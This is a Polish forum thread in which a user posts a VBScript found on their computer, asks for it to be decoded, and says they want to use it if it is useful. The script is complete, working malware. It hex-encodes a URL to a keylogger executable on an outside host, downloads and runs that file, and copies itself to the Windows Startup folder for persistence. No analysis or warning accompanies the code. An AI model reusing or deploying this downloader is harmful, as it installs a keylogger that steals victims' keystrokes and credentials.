Skocz do zawartości

Rekomendowane odpowiedzi

Siema pomoże mi ktoś to rozszyfrować ? znalazłem to na swoim kompie i chce to wykorzystać o ile to jest przydatne.

Do While not Conn("google.com", 2, 900)
WScript.Sleep(5000)
Loop
s = "svost.exe"
Dim File
Set File = CreateObject("Scripting.FileSystemObject")
Set Shell = CreateObject("WScript.Shell")
temp2 = Shell.ExpandEnvironmentStrings("%temp%") & "\winset.vbs"
startUp = Shell.SpecialFolders.Item("Startup") & "\winset.vbs"
Set args = WScript.Arguments
temp = Shell.ExpandEnvironmentStrings("%temp%") & "\"&s
U = hexDecode("%68%74%74%70%3A%2F%2F%74%69%62%69%61%6B%65%79%6C%6F%67%67%65%72%2E%63%6F%6D%2F%64%6F%77%6E%6C%6F%61%64%2F%6B%65%79%2E%65%78%65")
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", U, False
xHttp.Send
set service = GetObject ("winmgmts:")
for each Process in Service.InstancesOf ("Win32_Process")
If Process.Name = s then
wscript.quit
End If
next
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile temp, 2
end with
Shell.Run temp
Set oWS = WScript.CreateObject("WScript.Shell")
If File.FileExists(startUp) then
WScript.Quit
else
File.CopyFile temp2, startUp
End If
WScript.Quit
function hexDecode(str)
dim strDecoded, i, hexValue
strDecoded = ""
for i = 2 to Len(str)
hexValue = ""
while Mid(str, i, 1) <> "%" and i <= Len(str)
hexValue = hexValue + Mid(str, i, 1)
i = i+1
wend
strDecoded = strDecoded + chr(CLng("&h" & hexValue))
next
hexDecode = strDecoded
end function
Function Conn(sHost,iPings,iTO)
If iPings = "" Then iPings = 2
If iTO = "" Then iTO = 750
Const OpenAsDefault    = -2
Const FailIfNotExist   =  0
Const ForReading       =  1
Set oShell = CreateObject("WScript.Shell")
Set oFSO = CreateObject("Scripting.FileSystemObject")
sTemp = oShell.ExpandEnvironmentStrings("%TEMP%")
sTempFile = sTemp & "\runresult.tmp"
oShell.Run "%comspec% /c ping -n " & iPings & " -w " & iTO _
& " " & sHost & ">" & sTempFile, 0 , True
Set fFile = oFSO.OpenTextFile(sTempFile, ForReading, _
FailIfNotExist, OpenAsDefault)
sResults = fFile.ReadAll
fFile.Close
oFSO.DeleteFile(sTempFile)
Select Case InStr(sResults,"TTL=")
Case 0 Conn = False
Case Else Conn = True
End Select
End Function
Z góry dziękuję za odpowiedz :D
Odnośnik do komentarza
  • temat został zablokowany
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Regulamin. Polityka prywatności